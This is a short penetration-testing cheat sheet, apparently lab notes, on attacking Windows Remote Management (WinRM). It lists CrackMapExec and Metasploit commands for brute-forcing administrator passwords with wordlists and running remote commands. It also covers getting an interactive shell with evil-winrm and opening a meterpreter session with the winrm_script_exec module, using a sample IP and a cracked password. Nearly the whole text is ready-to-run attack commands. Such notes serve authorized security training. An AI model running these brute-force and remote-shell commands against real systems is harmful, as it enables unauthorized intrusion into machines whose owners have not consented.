Brute force and Authentication
#Enumeration
#CrackMapExec Brute-force
crackmapexec winrm <ip address> -u username or file -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
EXAMPLE:-
crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtExecute specific Windows commands
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"
Metasploit Brute Force
# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtevil-WinRM Shell
Get a command shell session using
evil-winrmtool
evil-winrm.rb -u username -p 'password' -i <ip address>
Example:-
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175#Metasploit meterpreter session
Another alternative for Winrm is its WinRm metasploit module
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploitLast updated